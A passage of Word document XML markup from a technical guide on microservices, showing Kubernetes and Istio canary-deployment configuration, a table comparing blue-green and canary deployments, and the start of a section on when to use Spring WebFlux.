          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>service mesh</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like Istio) or Kubernetes itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B299B2"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apiVersion: apps/v1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BF2CAA"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lastRenderedPageBreak/>
        <w:t>kind: Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2137EB"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metadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686B1B1E"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name: myservice-canary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFC4BB3"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spec:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF11142"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replicas: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072FD4F1"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selector:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5108CB5C"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matchLabels:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596E6FE6"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app: myservice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC79E79"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version: canary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11177295"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template:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9383E3"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metadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7537796C"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labels:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3A1BE4"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app: myservice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4CFD2E"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version: canary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0099913A"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spec:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E650470"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containers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2467F02B"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 name: myservice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4275586E"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image: myservice:v2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACE5C00"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ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AC3AAD"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 containerPort: 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F53CE0B"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Using </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Istio</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for traffic splitting:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D147BF8"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apiVersion: networking.istio.io/v1alpha3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E4E297"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kind: VirtualService</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D57A53"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metadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C26FDD"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name: myservice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4A1D1E"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spec:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4BEBB4"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hosts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479E3B98"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 myservice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6122F1"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http:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55864088"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 route:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A66781A"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 destination:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681A36FD"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host: myservice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BC74EE"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subset: v1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DEB350"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weight: 90</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4291F0A2"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 destination:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C95841"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host: myservice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4BBAEA"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subset: v2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4E5BE2"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        weight: 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B279B67"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This configuration routes 90% of traffic to the old version (v1) and 10% to the new version (v2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3981C85D" w14:textId="77777777" w:rsidR="00312742"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54F903B">
          <v:rect id="_x0000_i2856" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F05AB2"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Key Differences Between Blue-Green and Canary Deploym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8"/>
        <w:gridCol w:w="3652"/>
        <w:gridCol w:w="4534"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FA65E9" w:rsidRPr="00FA65E9" w14:paraId="1C170390" w14:textId="77777777" w:rsidTr="00312742">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19D44060"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7EB650F4"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Blue-Green Deployment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="334C95AE"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Canary Deployment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA65E9" w:rsidRPr="00FA65E9" w14:paraId="35F83AA7" w14:textId="77777777" w:rsidTr="00312742">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39F06C80"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Deployment Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="577F4563"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Switch from old version (Blue) to new version (Green)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4895CD77"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Gradual rollout to a small subset of users first</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA65E9" w:rsidRPr="00FA65E9" w14:paraId="2F1CE6E8" w14:textId="77777777" w:rsidTr="00312742">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EEEEC24"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Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7EE5E1E3"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Low risk (because of full rollback to Blue)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5417C63D"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Medium risk (issues are identified in early users)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA65E9" w:rsidRPr="00FA65E9" w14:paraId="772BDCAE" w14:textId="77777777" w:rsidTr="00312742">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02D31678"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Traffic Routing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7711B84E"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Switch all traffic to Green at once</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DD889D0"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Gradual increase of traffic to new version</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA65E9" w:rsidRPr="00FA65E9" w14:paraId="74C3FDEA" w14:textId="77777777" w:rsidTr="00312742">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68BE039B"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Rollback</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C9D5003"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Easy and quick rollback to Blue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A1362DA"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Rollback to old version is possible but more complex</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA65E9" w:rsidRPr="00FA65E9" w14:paraId="28DA6AF3" w14:textId="77777777" w:rsidTr="00312742">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DF0E71B"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Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DDEBC45"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Critical updates with zero downtime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24E96528"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Feature testing and performance validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA65E9" w:rsidRPr="00FA65E9" w14:paraId="284E1E72" w14:textId="77777777" w:rsidTr="00312742">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E45C7B0"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Cost/Resources</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="360A9BDB"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Requires duplicate environments (Blue and Green)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5009F022"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Requires careful monitoring but no need for duplicate environments</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA65E9" w:rsidRPr="00FA65E9" w14:paraId="2315DF41" w14:textId="77777777" w:rsidTr="00312742">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57F2C9F0"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Ease of Implementation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1839E3D1"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Simple to manage traffic switching</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FE5846A"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Requires monitoring and controlled traffic splitting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="19228720" w14:textId="77777777" w:rsidR="00312742"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85D0818">
          <v:rect id="_x0000_i2857" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA6872D"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lastRenderedPageBreak/>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9CBE28"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Both </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Blue-Green</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Canary</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> deployments are valuable strategies in microservices architectures, and choosing between them depends on your goals and requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47380B8D"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Blue-Green Deployment</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is best for </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>zero-downtime deployments</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>critical updates</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where an easy rollback is necessary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C200659"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Canary Deployment</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is ideal for </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>gradually releasing new features</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, gathering </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>early feedback</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>monitoring</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the performance of a new version before full-scale deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A07447"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In practice, both strategies can be combined in different stages of the deployment pipeline depending on the level of risk tolerance and the complexity of the service being deployed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BA9F93" w14:textId="7D8C16E1" w:rsidR="00115965" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0011596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0E0077E">
          <v:rect id="_x0000_i2858" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="769453EA" w14:textId="6872FF26" w:rsidR="00615C7B" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA22DA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="687" w:name="_Toc196308167"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>When to use WebFlux for reactive microservices</w:t>
      </w:r>
      <w:r w:rsidR="00615C7B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="687"/>
    </w:p>
    <w:p w14:paraId="5180D938" w14:textId="4CCBB1DA" w:rsidR="00312742" w:rsidRPr="00FA65E9" w:rsidRDefault="00312742" w:rsidP="00FA65E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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WebFlux</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> designed to support building </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. It’s especially useful for building </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>asynchronous</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>event-driven</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> microservices that can scale to handle many concurrent connections efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571A2C82"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Here are the key scenarios when you should consider using </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WebFlux</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for reactive microservices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222A5809" w14:textId="77777777" w:rsidR="00312742"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BE4F067">
          <v:rect id="_x0000_i2859" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D801ED2"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1. High Concurrency and Scalability Needs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472B380E"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Use WebFlux when your microservices need to handle a large number of concurrent requests</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that are I/O bound (e.g., making multiple database calls or calling other services). Reactive programming models in WebFlux provide better scalability and lower resource consumption compared to traditional thread-per-request models (like in Spring MVC).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60123BCA"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
